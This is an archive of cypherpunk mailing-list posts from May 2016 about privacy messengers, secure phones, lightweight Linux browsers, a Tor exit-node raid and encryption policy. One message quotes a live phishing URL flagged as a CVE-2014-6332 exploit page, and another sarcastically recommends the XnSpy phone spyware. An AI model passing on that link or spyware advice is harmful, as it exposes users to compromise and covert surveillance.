I don't know enough to have an opinion. The project has apparently been abandoned. But the software does seem to work. My friend Razor reviewed Pond last year and his review still seems valid. From mrnobody at mail-on.us Thu May 12 11:24:22 2016 From: mrnobody at mail-on.us (mrnobody at mail-on.us) Date: Thu, 12 May 2016 13:24:22 -0500 Subject: What happened to Pond? In-Reply-To: <5733809B.6060303@riseup.net> References: <20160508054911.Horde.41eGISY6pBupXDo6THbl0g1@www.vfemail.net> <20160510132703.GV18163@hidden> <5731F40D.6000107@riseup.net> <20160510165304.Horde.IyUKGb6zK06qfLX58JwgBg1@www.vfemail.net> <5733809B.6060303@riseup.net> Message-ID: <20160512132422.Horde.RkUVfytuw8T-aLDwsHVeWQ8@www.vfemail.net> Great post by your friend Razor, very enthusiast, made me remember the nice impression I got when I first heard about it. Besides I didn't know about that blog. Thank you very much for sharing.

Quoting Mirimir <mirimir at riseup.net>:

On 05/10/2016 03:53 PM, mrnobody at mail-on.us wrote:
I checked the repo, I saw there hasn't been a commit for a year or so. I
wanted to know your personal opinion on the project. I'd personally have
a look at the code but I know nothing of go.
<p>Quoting Mirimir &lt;<a
href="mailto:mirimir at riseup.net">mirimir at riseup.net</a>&gt;:</p><blockquote
type="cite" style="border-left:2px solid
blue;margin-left:2px;padding-left:12px;">On 05/10/2016 07:27 AM, Ola
Bini wrote:<blockquote type="cite" style="border-left:2px solid
blue;margin-left:2px;padding-left:12px;"><blockquote type="cite"
style="border-left:2px solid
blue;margin-left:2px;padding-left:12px;">Can the content be committed to
the github repo?</blockquote>Did you even look in the repo?<br />
<br />
<a href="https://github.com/agl/pond/tree/master/doc"
target="_blank">https://github.com/agl/pond/tree/master/doc</a><br />
<br />
Cheers</blockquote>Well, is all of the former web content in the
repo?</blockquote><br /><br />
I don't know enough to have an opinion. The project has apparently been
abandoned. But the software does seem to work. My friend Razor reviewed
Pond last year <http://dbshmc5frbchaum2.onion/Pond-Review.html> and hisreview still seems valid.


------------------------------------------------- ONLY AT VFEmail! - Use our Metadata Mitigator to keep your email out of the NSA's hands! $24.95 ONETIME Lifetime accounts with Privacy Features! 15GB disk! No bandwidth quotas! Commercial and Bulk Mail Options! From hettinga at gmail.com Thu May 12 15:49:33 2016 From: hettinga at gmail.com (Robert Hettinga) Date: Thu, 12 May 2016 18:49:33 -0400 Subject: Proof-of-Satoshi fails Proof-of-Proof. In-Reply-To: <572A7B5E.20904@iang.org> References: <2CF6A1BE-9912-4FE6-98F4-202E539D9795@gmail.com> <572A7B5E.20904@iang.org> Message-ID: > On May 4, 2016, at 6:44 PM, ianG wrote: > > Keys can be lost. So, the dog ate his homework. Right. Pics or it didn’t happen. Cheers, RAH From zen at freedbms.net Thu May 12 17:31:15 2016 From: zen at freedbms.net (Zenaan Harkness) Date: Fri, 13 May 2016 00:31:15 +0000 Subject: [tor-talk] OT: Bitmessage In-Reply-To: References: <56AB637C.8070001@anonymous.coward.posteo.de> <56AC1AC2.6090706@cajuntechie.org> <56AC94C3.3030501@gmail.com> Message-ID: On 2/7/16, grarpamp wrote: > On Sat, Jan 30, 2016 at 6:14 AM, Tom A. wrote: >> Yes take care and look yourself or believe so called experts or >> multiplicators. > > Fine example of the classic passive shilling for GoldBug / BitMail, etc. > >> I agree that all closed source crypto is obsolete. > > Yeah, so is all the non-reproducible binaries of opensource code > above, deleting critiques off your own forums, etc... ahem. There's a theory that the stupider someone is, the less it costs to buy their corruption. >>> Also, since Tom spammed a link to BitMail, it's worth noting that >>> BitMail appears to be developed by the same people who made GoldBug. >>> For those of you keeping score at home, GoldBug falsely claimed to be >>> a project of EFF and CCC. It would be wise to assume that BitMail is >>> malware or backdoored unless proven otherwise. > > Tom's long been associated with their little game. > Search the whole scam out on tor-talk, cpunks, google, etc. > > Till y'all step up to the plate... hasta Asta. From mrnobody at mail-on.us Fri May 13 13:12:08 2016 From: mrnobody at mail-on.us (mrnobody at mail-on.us) Date: Fri, 13 May 2016 20:12:08 +0000 Subject: FYI: 'Private Smartphone' ... UnaPhone Zenith In-Reply-To: <57262AE8.2020902@riseup.net> References: <57262AE8.2020902@riseup.net> Message-ID: <57363518.5050200@mail-on.us> Read about it, and watched a promotional video in youtube (not very good tbh). The main problem I see is being locked in the applications they bundle on it. Would it be possible to install open source apps from another storre such as F-Droid? Rayzer: > Via tuta.io, links are shortlinks to indiegogo: > > Tutanota Introduces Private Smartphone: UnaPhone Zenith > > Dear privacy-friend, > > we are excited to let you know that we have partnered with Una to bring > to you the most private and secure smartphone: the UnaPhone Zenith. We > at Tutanota and Una believe that a phone should not be your personal > surveillance device, but simply your personal phone, where all the data > remains with you and cannot be exploited. Una has just launched a > crowdfunding campaign to bring the Zenith to life > . As their partner we are proud to let you > know about this perfect chance to get the Zenith as an early bird! > > > We call it: the Anti-Google Phone! > > The UnaPhone Zenith is the first truly secure and private Android > smartphone without any compromises. It doesn’t use any Google services, > shady apps or strange permissions. With the Zenith you can stay calm > knowing that you are never tracked and that your data is never being > sold. The phone comes with the most secure open source third party apps. > Of course, the Tutanota App is already pre-installed. > > We hope you share our passion for privacy and support this project > . Personally, we are thrilled that there > will be a phone available making sure that our data cannot be abused - > not even by the carrier. We can't wait to get a Zenith ourselves! > > Cheers, > your TutanotaTeam > > > -------------- next part -------------- A non-text attachment was scrubbed... Name: 0xAE008E43.asc Type: application/pgp-keys Size: 3082 bytes Desc: not available URL: -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 801 bytes Desc: OpenPGP digital signature URL: From juan.g71 at gmail.com Fri May 13 16:21:23 2016 From: juan.g71 at gmail.com (juan) Date: Fri, 13 May 2016 20:21:23 -0300 Subject: LMAO at linux In-Reply-To: References: Message-ID: <57366151.06e28c0a.d5844.ffff86ff@mx.google.com> https://wiki.archlinux.org/index.php/Zeitgeist From rayzer at riseup.net Fri May 13 21:23:11 2016 From: rayzer at riseup.net (Rayzer) Date: Fri, 13 May 2016 21:23:11 -0700 Subject: LMAO at linux In-Reply-To: <57367ee0.d09a370a.e7dfe.184d@mx.google.com> References: <57366151.06e28c0a.d5844.ffff86ff@mx.google.com> <57367ee0.d09a370a.e7dfe.184d@mx.google.com> Message-ID: <5736A82F.5080801@riseup.net> On 05/13/2016 06:27 PM, juan wrote: > Is there a decent, non-bloated browser out there? Imho Seamonkey. Requires manual install as there doesn't seem to be a .deb or any other kind of repository offering it. There is a Linux version available though. -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 836 bytes Desc: OpenPGP digital signature URL: From juan.g71 at gmail.com Fri May 13 18:27:30 2016 From: juan.g71 at gmail.com (juan) Date: Fri, 13 May 2016 22:27:30 -0300 Subject: LMAO at linux In-Reply-To: References: <57366151.06e28c0a.d5844.ffff86ff@mx.google.com> Message-ID: <57367ee0.d09a370a.e7dfe.184d@mx.google.com> On Sat, 14 May 2016 00:58:28 +0000 Zenaan Harkness wrote: > On 5/13/16, juan wrote: > > https://wiki.archlinux.org/index.php/Zeitgeist > > This everything log sounds really convenient - almost as convenient as > an rfid microchip in the wrist so you don't have to pull out the > wallet when paying for something. For what it's worth, zeitgeist is a dependency for the archlinux midori package. Is there a decent, non-bloated browser out there? (seems like a rhetorical question...) From rayzer at riseup.net Fri May 13 22:37:41 2016 From: rayzer at riseup.net (Rayzer) Date: Fri, 13 May 2016 22:37:41 -0700 Subject: LMAO at linux In-Reply-To: <5736b140.ac688c0a.3b0dc.ffffa8aa@mx.google.com> References: <57366151.06e28c0a.d5844.ffff86ff@mx.google.com> <57367ee0.d09a370a.e7dfe.184d@mx.google.com> <5736A82F.5080801@riseup.net> <5736b140.ac688c0a.3b0dc.ffffa8aa@mx.google.com> Message-ID: <5736B9A5.40801@riseup.net> On 05/13/2016 10:02 PM, juan wrote: > On Fri, 13 May 2016 21:23:11 -0700 > Rayzer wrote: > >> >> On 05/13/2016 06:27 PM, juan wrote: >>> Is there a decent, non-bloated browser out there? >> Imho Seamonkey. Requires manual install as there doesn't seem to be a >> .deb or any other kind of repository offering it. There is a Linux >> version available though. >> > Well, isn't that as bloated as firefox...? Even worse > since it also has mail, irc, an html editor(...) etc. > It has features built in that would make it seem so but the memory use is MUCH MUCH lower than Firefox. 1/3 to 1/2 of what FF uses on my system. Even when mail and the browser are open at the same time. Compared to FF and Tbird... There is no comparison. Those two together used to slow my old single core machine down to a crawl or stop but Seamonkey never did. -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 836 bytes Desc: OpenPGP digital signature URL: From zen at freedbms.net Fri May 13 17:58:28 2016 From: zen at freedbms.net (Zenaan Harkness) Date: Sat, 14 May 2016 00:58:28 +0000 Subject: LMAO at linux In-Reply-To: <57366151.06e28c0a.d5844.ffff86ff@mx.google.com> References: <57366151.06e28c0a.d5844.ffff86ff@mx.google.com> Message-ID: On 5/13/16, juan wrote: > https://wiki.archlinux.org/index.php/Zeitgeist This everything log sounds really convenient - almost as convenient as an rfid microchip in the wrist so you don't have to pull out the wallet when paying for something. From juan.g71 at gmail.com Fri May 13 22:02:26 2016 From: juan.g71 at gmail.com (juan) Date: Sat, 14 May 2016 02:02:26 -0300 Subject: LMAO at linux In-Reply-To: <5736A82F.5080801@riseup.net> References: <57366151.06e28c0a.d5844.ffff86ff@mx.google.com> <57367ee0.d09a370a.e7dfe.184d@mx.google.com> <5736A82F.5080801@riseup.net> Message-ID: <5736b140.ac688c0a.3b0dc.ffffa8aa@mx.google.com> On Fri, 13 May 2016 21:23:11 -0700 Rayzer wrote: > > > On 05/13/2016 06:27 PM, juan wrote: > > Is there a decent, non-bloated browser out there? > > Imho Seamonkey. Requires manual install as there doesn't seem to be a > .deb or any other kind of repository offering it. There is a Linux > version available though. > Well, isn't that as bloated as firefox...? Even worse since it also has mail, irc, an html editor(...) etc. From peter at m-o-o-t.org Fri May 13 18:53:49 2016 From: peter at m-o-o-t.org (Peter Fairbrother) Date: Sat, 14 May 2016 02:53:49 +0100 Subject: LMAO at linux In-Reply-To: <57367ee0.d09a370a.e7dfe.184d@mx.google.com> References: <57366151.06e28c0a.d5844.ffff86ff@mx.google.com> <57367ee0.d09a370a.e7dfe.184d@mx.google.com> Message-ID: <5736852C.9090907@m-o-o-t.org> On 14/05/16 02:27, juan wrote: > On Sat, 14 May 2016 00:58:28 +0000 > Zenaan Harkness wrote: > >> On 5/13/16, juan wrote: >>> https://wiki.archlinux.org/index.php/Zeitgeist >> >> This everything log sounds really convenient - almost as convenient as >> an rfid microchip in the wrist so you don't have to pull out the >> wallet when paying for something. > > For what it's worth, zeitgeist is a dependency for the archlinux midori > package. And tracker is a dependency for gnome .. -- P From zen at freedbms.net Fri May 13 20:34:40 2016 From: zen at freedbms.net (Zenaan Harkness) Date: Sat, 14 May 2016 03:34:40 +0000 Subject: Do you notice significant persistent change in climate? In-Reply-To: <20160406124923.GA677@sivokote.iziade.m$> References: <20160406124923.GA677@sivokote.iziade.m$> Message-ID: OK, here's the best editorial I've found in the last couple of weeks regarding NASA's "the earth is greening due to CO2" data/ announcement: http://journal-neo.org/2016/05/13/the-very-good-effect-of-more-co2/ Enjoy our climate change, it's the best thing for us... From blibbet at gmail.com Sat May 14 10:56:08 2016 From: blibbet at gmail.com (Blibbet) Date: Sat, 14 May 2016 10:56:08 -0700 Subject: Seattle-area: TA3M Seattle is Monday Message-ID: <573766B8.4050508@gmail.com> If you are in the Seattle-area, this Monday at University of Washington at TA3M (Techno-Activism, 3rd Mondays). The targets of the recent Tor exit node -- who are also the leaders of the Seattle Privacy Coalition -- who were raided by Seattle Police Dept by Seattle Police Dept. will be speaking about the raid. -------- Forwarded Message -------- Subject: [TA3M-Seattle] TA3M May on Monday May 16: Hear from Seattle Privacy Activists & Lightning Talks Date: Fri, 13 May 2016 20:53:45 -0700 (PDT) From: Paul English To: ta3m-seattle at ta3m.org CC: ta3m-seattle at lists.openitp.org, Seattle Privacy Hello again! TA3M Seattle is meeting on Monday May 16 at 6:30pm. Talks start at 7pm This month we'll be hearing from Seattle Privacy Coalition activists David & Jan about the police raid on their house for running a Tor exit node. Lightning Talks - bring your 5-minute Lightning talks on Technology Activism, Privacy infosec, cryptography etc. We should have time for 10 of these. When: Monday May 16, 2016, 6:30-9:30pm Where: University of Washington (main campus) Paul G. Allen Center for Computer Science and Engineering (CSE), Room 403, 185 W Stevens Way NE, Seattle, WA 98195 __Schedule__ 6:30-7:00 pizza & socialize in CSE building lobby table area 7:00-? Dave & Jan talk about Tor exit node police raid. ?-9:00 Lightning talks ------------------------------------------------------------------------------------------------- Techno-Activism Third Mondays (TA3M) is an informal meetup designed to connect software creators and activists who are interested in censorship, surveillance, and open technology. Currently, TA3M are held in various cities throughout the world, with many more launching in the near future. In Seattle, thanks to a special donor, there will be free pizza! _______________________________________________ TA3M-Seattle mailing list TA3M-Seattle at lists.openitp.org https://lists.openitp.org/mailman/listinfo/ta3m-seattle From guninski at guninski.com Sat May 14 06:37:54 2016 From: guninski at guninski.com (Georgi Guninski) Date: Sat, 14 May 2016 16:37:54 +0300 Subject: In-Reply-To: References: <017201d1aa83$232378e0$696a6aa0$@gmail.com> Message-ID: <20160514133754.GA689@sivokote.iziade.m$> On Tue, May 10, 2016 at 06:52:57AM -0400, John Young wrote: > At 02:13 AM 5/10/2016, Greg Moss imposter phished: > >http://219.234.6.206:8080/ > > Which produces: > > Web attack: Microsoft OleAut32 RCE CVE-2014-6332 The google headers appear a bit weird, showing the sender's IP... From grarpamp at gmail.com Sat May 14 15:33:04 2016 From: grarpamp at gmail.com (grarpamp) Date: Sat, 14 May 2016 18:33:04 -0400 Subject: XnSpy In-Reply-To: References: Message-ID: On 5/14/16, Yush Bhardwaj wrote: > anyone have any idea about XnSpy android spy software? Yes, it's awesome, get it and install it on your phone! From juan.g71 at gmail.com Sat May 14 12:33:17 2016 From: juan.g71 at gmail.com (juan) Date: Sat, 14 May 2016 19:33:17 +0000 Subject: LMAO at linux In-Reply-To: <20160514194350.5b162730@localhost.localdomain> References: <57366151.06e28c0a.d5844.ffff86ff@mx.google.com> <57367ee0.d09a370a.e7dfe.184d@mx.google.com> <20160514194350.5b162730@localhost.localdomain> Message-ID: <5737a788.81f28c0a.16880.01ae@mx.google.com> On Sat, 14 May 2016 19:43:50 +1000 Jason Richards wrote: > juan: > > Is there a decent, non-bloated browser out there? (seems like a > > rhetorical question...) > > Dillo works OK, but has limited HTTPS support. > > surf from suckless.org seems to work well. Thanks. A distro I use (SliTaz) has a browser that might be described as a 'very thin' wrapper for webkit. The exe is 27kb. Surf looks similar... I guess the problem is not so much the bloated browsers but the bloated providers of 'content' which should actually be described as propaganda and garbage. > > J From jjr2 at gmx.com Sat May 14 02:43:50 2016 From: jjr2 at gmx.com (Jason Richards) Date: Sat, 14 May 2016 19:43:50 +1000 Subject: LMAO at linux In-Reply-To: <57367ee0.d09a370a.e7dfe.184d@mx.google.com> References: <57366151.06e28c0a.d5844.ffff86ff@mx.google.com> <57367ee0.d09a370a.e7dfe.184d@mx.google.com> Message-ID: <20160514194350.5b162730@localhost.localdomain> juan: > Is there a decent, non-bloated browser out there? (seems like a > rhetorical question...) Dillo works OK, but has limited HTTPS support. surf from suckless.org seems to work well. J From ryacko at gmail.com Sun May 15 00:36:22 2016 From: ryacko at gmail.com (Ryan Carboni) Date: Sun, 15 May 2016 00:36:22 -0700 Subject: The Hullabaloo over Encryption Message-ID: Why is the FBI against encryption? Why did the former NSA and CIA chiefs come in favor of encryption? Their statements are hard to decipher on the subject, but not hard to figure out. It is usually easier to make everything but the cipher weak. Protocols and programs commonly used are either not done properly or non standardized, and best practices have been slow in coming. Furthermore, the FBI has not been clear on this, but apparently they want data in motion to be decrypted and encrypted by a central point, and for data at rest to not be encrypted. (I seriously doubt Marcy Wheeler's claims of Comey's charisma if he has not even been able to say in one sentence about what the FBI wants, unless she's flirting with him) For groups to organize they need to communicate. Criminals use off the shelf encryption tools, and their devices are not continuously connected, and even less likely to be able to run root code on each other's devices (although social engineering does work). What the NSA and the CIA does is harder to guess, but it becomes somewhat obvious that no nation-state has publicly explained how to design a proper protocol (AFAIK). Furthermore, you do hear in the news about https://en.wikipedia.org/wiki/2008_cyberattack_on_United_States . Essentially, common criminals have a small attack surface. Nationstates have a larger attack surface, so encryption is less significant. From yushbhardwaj91 at gmail.com Sat May 14 13:31:01 2016 From: yushbhardwaj91 at gmail.com (Yush Bhardwaj) Date: Sun, 15 May 2016 02:01:01 +0530 Subject: XnSpy Message-ID: anyone have any idea about XnSpy android spy software? *Yush Bhardwaj* -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 777 bytes Desc: not available URL: From jya at pipeline.com Sun May 15 06:44:13 2016 From: jya at pipeline.com (John Young) Date: Sun, 15 May 2016 09:44:13 -0400 Subject: Cypherpunks: Renegades, Risk Takers - Smart, Provocative Entertainment Message-ID: http://www.businesswire.com/news/home/20160419006752/en/Laura-Poitras%C2%A0Risk%C2%A0to-World-Premiere-Cannes-Film-Festivals-Directors Risk is a fresh take on the renegades, the cypherpunks, the risk takers. First Look Media announced today that Laura Poitras' new feature film Risk will have its world premiere at the Cannes Film Festival's 48th Directors' Fortnight (Quinzaine des Réalisateurs). This dramatic documentary with a cypherpunk spirit reveals the stakes and opportunities of truth-telling and finds Poitras embedded with Julian Assange over the past five years. Risk is her highly anticipated follow-up to Citizenfour, Academy Award® winner for Best Documentary. Risk is produced by Praxis Films in association with First Look Media and Field of Vision. World sales will be handled by Josh Braun of Submarine. First Look Media is a new-model media company devoted to supporting independent voices across all platforms, from investigative journalism and documentary filmmaking to smart, provocative entertainment. eBay founder and philanthropist Pierre Omidyar launched First Look in 2013 with the belief that independent perspectives are vital to a vibrant culture and thriving democracy. First Look operates as both a studio and digital media company. From drwho at virtadpt.net Sun May 15 14:53:20 2016 From: drwho at virtadpt.net (The Doctor) Date: Sun, 15 May 2016 14:53:20 -0700 Subject: LMAO at linux In-Reply-To: <5736b140.ac688c0a.3b0dc.ffffa8aa@mx.google.com> References: <57366151.06e28c0a.d5844.ffff86ff@mx.google.com> <57367ee0.d09a370a.e7dfe.184d@mx.google.com> <5736A82F.5080801@riseup.net> <5736b140.ac688c0a.3b0dc.ffffa8aa@mx.google.com> Message-ID: <20160515145320.09cbd97bb41680dacc6131b6@virtadpt.net> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 On Sat, 14 May 2016 02:02:26 -0300 juan wrote: > Well, isn't that as bloated as firefox...? Even worse > since it also has mail, irc, an html editor(...) etc. [drwho at windbringer ~]$ cd /usr/bin/ [drwho at windbringer bin]$ ls -alF firefox seamonkey lrwxrwxrwx 1 root root 24 Jan 6 20:35 firefox -> /usr/lib/firefox/firefox* lrwxrwxrwx 1 root root 33 Dec 6 16:12 seamonkey - -> /usr/lib/seamonkey-2.39/seamonkey* [drwho at windbringer bin]$ ls -alF /usr/lib/firefox/firefox /usr/lib/seamonkey-2.39/seamonkey - -rwxr-xr-x 1 root root 150720 Jan 6 20:35 /usr/lib/firefox/firefox* - -rwxr-xr-x 1 root root 121848 Dec 6 16:12 /usr/lib/seamonkey-2.39/seamonkey* Oh, and just for fun, here's Palemoon's (https://www.palemoon.org/) disk footprint: [drwho at windbringer bin]$ ls -alF /usr/lib/palemoon/palemoon - -rwxr-xr-x 1 root root 240720 Apr 30 21:18 /usr/lib/palemoon/palemoon* - -- The Doctor [412/724/301/703/415] [ZS] PGP: 0x807B17C1 / 7960 1CDC 85C9 0B63 8D9F DD89 3BD8 FF2B 807B 17C1 WWW: https://drwho.virtadpt.net/ Live a life worthy of Leonard Cohen lyrics. -----BEGIN PGP SIGNATURE----- iQIcBAEBCgAGBQJXOO/RAAoJED1np1pUQ8RkGZMP/Az2p4yKjmPGZheNdMZp3ft5 sI/hkHa4Sp/o+4fjSrKopePfELXUn2WL17Ml0rZ1zbOl7qdbhumJ4/VwKHjDBNJ8 GchB031X8Vv7awN5NdtF300va78FYym2HSnpoXy5apQ46F1SBYUAVa5OYR+eXVVI ZJlT4EowlaZ0LuZWuUD7d94CNn7LHz7vLZgHeGaVHYnJnGD/9oTqXe+aDSRvhG9L ebesuJVosshuARtRt0paeiiBTnJAvUM2beQMVUj0N9RrK23kgeQoP3qAjyf+VuQK JpyOTCa2EiSDkQQNyR7JTgQsXzjWmV4YE9V6MuMRNy8TzEM5Pvj4f/zC2+VY8+JX vP/0B8kQCVhxCfbHlNwsXRbXHrJ6IRfFOHm5bx0wDE4YSFhA04QLf1md1QavCTZB h0nPHL8SZLYlDLJf8le8yz5ev8anW6tM6IxHlXigQugEPMLecd6H78az/QyiyFJw qGOJGfUxg8Bl/3ixPISiWq4uT4g8j9c1zCZMFbNad7wVgm8m0ZL7nAI31HgwVTqw eQGoUevN/bSPckra3E/FoOqdw046iy/XncL7IHdgPJjMBHjzjXFoFZFMnxyu/YhI +QXkJ1fX04gdjdcdPfgUsQpSTXQdkllPJuQlQIzDP9WRugNu+zBcPzU2eWQ3DRHa IJRlJepsW/6UeNKsPcfQ =0Gj6 -----END PGP SIGNATURE----- From drwho at virtadpt.net Sun May 15 16:55:13 2016 From: drwho at virtadpt.net (The Doctor) Date: Sun, 15 May 2016 16:55:13 -0700 Subject: LMAO at linux In-Reply-To: References: <57366151.06e28c0a.d5844.ffff86ff@mx.google.com> Message-ID: <20160515165513.807590f56de03b56f6ea122f@virtadpt.net> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 On Sat, 14 May 2016 00:58:28 +0000 Zenaan Harkness wrote: > This everything log sounds really convenient - almost as convenient as > an rfid microchip in the wrist so you don't have to pull out the > wallet when paying for something. You can always turn it off and write stuff down on notecards. Or install the stickynote application of your choice. Failing that, I hear that ~/notes.txt is traditional... - -- The Doctor [412/724/301/703/415] [ZS] PGP: 0x807B17C1 / 7960 1CDC 85C9 0B63 8D9F DD89 3BD8 FF2B 807B 17C1 WWW: https://drwho.virtadpt.net/ "Seal number four cannot be removed, I think I goofed up when I sealed it." -----BEGIN PGP SIGNATURE----- iQIcBAEBCgAGBQJXOQxhAAoJED1np1pUQ8RkhDoP/Ag6hCequeQeZgfvIxJUU9Ve 2b1z1kHuCM55GnhCNH+jNYNnDe4AcPopGeCkmaybfT+alSHJpZj1dRArW2EOAJ6h kaJnp+w7ZWbnp0GcZh6jjQ+60/uxCkcsrRxB0emSjbl/hzHSS7uDlglaU59lslV3 RNtR2sHGZBpJV/d6zUZhzegP+uGe6OecUIS2KCur6QVVOf5XHd9Lf8BuZTQDPeLB ELGa3j5fqQtuN5DzNdeLRvjq7Fy1qNTtPjm4s6CvY6slh/AvMG9OwM6lPFzhGV7k 0r7phpQ4W9f579/78nEQ0lm5tLcWy/XzBzsowrbHoTPtZKDF8rPappoDsFDD3Ns2 woxY5I9Hpiv8ORGMUXY+2fzL6nwLyPuLbNuvsmdZd3HlHvtxJGkiLEO5KyXdHZx6 Il8ST3SfeMZqJJ/dqolL3EWGlHIy/zf6SH1WxAWMsJrf3Ogl9GjecC/NJAoAKPbJ 6V14kjObnYubitCWBK/6xkd1F9TePFVZ4oGcoN6RjbJGk3o8HVxqmEZIR6WL6yIh vOowOQJf+5iWjoU29x0DxMX1eDO1RkqZoMKOn4pkXlOKidHZT3MKOZ5642vce52O q7yzyhbSD/lZSUnjcPVNWaGDMwkRUJfbq1lvnqxZRE7EvNyv3RjQtj6TLYp25nCC ZE0OUkmpD+p3914kuIL1 =3PfM -----END PGP SIGNATURE----- From yushbhardwaj91 at gmail.com Sun May 15 06:02:20 2016 From: yushbhardwaj91 at gmail.com (Yush Bhardwaj) Date: Sun, 15 May 2016 18:32:20 +0530 Subject: XnSpy In-Reply-To: References: Message-ID: Will it work after what's app end to end encryption. *Yush Bhardwaj* On Sun, May 15, 2016 at 4:03 AM, grarpamp wrote: > On 5/14/16, Yush Bhardwaj wrote: > > anyone have any idea about XnSpy android spy software? > > Yes, it's awesome, get it and install it on your phone! > -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 1443 bytes Desc: not available URL: From supergusano2 at gmail.com Sun May 15 16:52:13 2016 From: supergusano2 at gmail.com (Juan Gonzalez) Date: Sun, 15 May 2016 18:52:13 -0500 Subject: LMAO at linux In-Reply-To: <57390210.c6198c0a.b6fbe.ffff8712@mx.google.com> References: <57366151.06e28c0a.d5844.ffff86ff@mx.google.com> <57367ee0.d09a370a.e7dfe.184d@mx.google.com> <5736A82F.5080801@riseup.net> <5736b140.ac688c0a.3b0dc.ffffa8aa@mx.google.com> <20160515145320.09cbd97bb41680dacc6131b6@virtadpt.net> <57390210.c6198c0a.b6fbe.ffff8712@mx.google.com> Message-ID: Servo looks like it has potential, but you'll probably have to compile that from source On Sun, May 15, 2016 at 3:11 PM, juan wrote: > On Sun, 15 May 2016 14:53:20 -0700 > The Doctor > > > > > > Oh, and just for fun, here's Palemoon's (https://www.palemoon.org/) > > disk footprint: > > > > [drwho at windbringer bin]$ ls -alF /usr/lib/palemoon/palemoon > > - -rwxr-xr-x 1 root root 240720 Apr 30 > > > I just got the precompiled bz package - it's ~60mb uncompressed. > It seems to be a bit better/faster than current firefox, plus it > doesn't have the 'new' and 'improved' gui stuff... > > > -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 1128 bytes Desc: not available URL: From rayzer at riseup.net Sun May 15 19:17:09 2016 From: rayzer at riseup.net (Rayzer) Date: Sun, 15 May 2016 19:17:09 -0700 Subject: LMAO at linux In-Reply-To: <20160515145320.09cbd97bb41680dacc6131b6@virtadpt.net> References: <57366151.06e28c0a.d5844.ffff86ff@mx.google.com> <57367ee0.d09a370a.e7dfe.184d@mx.google.com> <5736A82F.5080801@riseup.net> <5736b140.ac688c0a.3b0dc.ffffa8aa@mx.google.com> <20160515145320.09cbd97bb41680dacc6131b6@virtadpt.net> Message-ID: <57392DA5.5070107@riseup.net> On 05/15/2016 02:53 PM, The Doctor wrote: > On Sat, 14 May 2016 02:02:26 -0300 > juan wrote: > > > Well, isn't that as bloated as firefox...? Even worse > > since it also has mail, irc, an html editor(...) etc. > > [drwho at windbringer ~]$ cd /usr/bin/ > > [drwho at windbringer bin]$ ls -alF firefox seamonkey > lrwxrwxrwx 1 root root 24 Jan 6 20:35 firefox -> > /usr/lib/firefox/firefox* > lrwxrwxrwx 1 root root 33 Dec 6 16:12 seamonkey > -> /usr/lib/seamonkey-2.39/seamonkey* > > [drwho at windbringer bin]$ ls -alF /usr/lib/firefox/firefox > /usr/lib/seamonkey-2.39/seamonkey > > -rwxr-xr-x 1 root root 150720 Jan 6 20:35 /usr/lib/firefox/firefox* > -rwxr-xr-x 1 root root 121848 Dec 6 16:12 > /usr/lib/seamonkey-2.39/seamonkey* > > Oh, and just for fun, here's Palemoon's (https://www.palemoon.org/) disk > footprint: > > [drwho at windbringer bin]$ ls -alF /usr/lib/palemoon/palemoon > -rwxr-xr-x 1 root root 240720 Apr 30 21:18 /usr/lib/palemoon/palemoon* > > Pale moon worked well for me using Windoze, which it's optimized for. It's memory control did not seem to be as good with the Mint/Lubuntu distro I installed on that same machine. HOWEVER at the time I was using an older single core machine that the later V of Palemoon didn't work with because of a chipset instruction not available in the Turlon64 chip. I never did try it with a later CPU and a recent Palemoon release.. -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 2153 bytes Desc: not available URL: -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 836 bytes Desc: OpenPGP digital signature URL: From juan.g71 at gmail.com Sun May 15 13:11:54 2016 From: juan.g71 at gmail.com (juan) Date: Sun, 15 May 2016 20:11:54 +0000 Subject: LMAO at linux In-Reply-To: <20160515145320.09cbd97bb41680dacc6131b6@virtadpt.net> References: <57366151.06e28c0a.d5844.ffff86ff@mx.google.com> <57367ee0.d09a370a.e7dfe.184d@mx.google.com> <5736A82F.5080801@riseup.net> <5736b140.ac688c0a.3b0dc.ffffa8aa@mx.google.com> <20160515145320.09cbd97bb41680dacc6131b6@virtadpt.net> Message-ID: <57390210.c6198c0a.b6fbe.ffff8712@mx.google.com> On Sun, 15 May 2016 14:53:20 -0700 The Doctor > > > Oh, and just for fun, here's Palemoon's (https://www.palemoon.org/) > disk footprint: > > [drwho at windbringer bin]$ ls -alF /usr/lib/palemoon/palemoon > - -rwxr-xr-x 1 root root 240720 Apr 30 I just got the precompiled bz package - it's ~60mb uncompressed. It seems to be a bit better/faster than current firefox, plus it doesn't have the 'new' and 'improved' gui stuff... From grarpamp at gmail.com Sun May 15 23:30:35 2016 From: grarpamp at gmail.com (grarpamp) Date: Mon, 16 May 2016 02:30:35 -0400 Subject: Anonymous Teaching Hacktivism and Hacking via OnionIRC Message-ID: https://twitter.com/onionirc irc://onionirchubx5363.onion:6667 ircs://onionirchubx5363.onion:6697 From mrnobody at mail-on.us Mon May 16 00:34:20 2016 From: mrnobody at mail-on.us (mrnobody at mail-on.us) Date: Mon, 16 May 2016 07:34:20 +0000 Subject: LMAO at linux In-Reply-To: References: <57366151.06e28c0a.d5844.ffff86ff@mx.google.com> <57367ee0.d09a370a.e7dfe.184d@mx.google.com> <5736A82F.5080801@riseup.net> <5736b140.ac688c0a.3b0dc.ffffa8aa@mx.google.com> <20160515145320.09cbd97bb41680dacc6131b6@virtadpt.net> <57390210.c6198c0a.b6fbe.ffff8712@mx.google.com> Message-ID: <573977FC.1050102@mail-on.us> Servo sounds like a good idea but afaik at the moment is just the engine right? I suppose in the future someone will build a browser on top of it. Juan Gonzalez: > Servo looks like it has potential, but you'll probably have to compile that > from source > > On Sun, May 15, 2016 at 3:11 PM, juan wrote: > >> On Sun, 15 May 2016 14:53:20 -0700 >> The Doctor >>> >>> Oh, and just for fun, here's Palemoon's (https://www.palemoon.org/) >>> disk footprint: 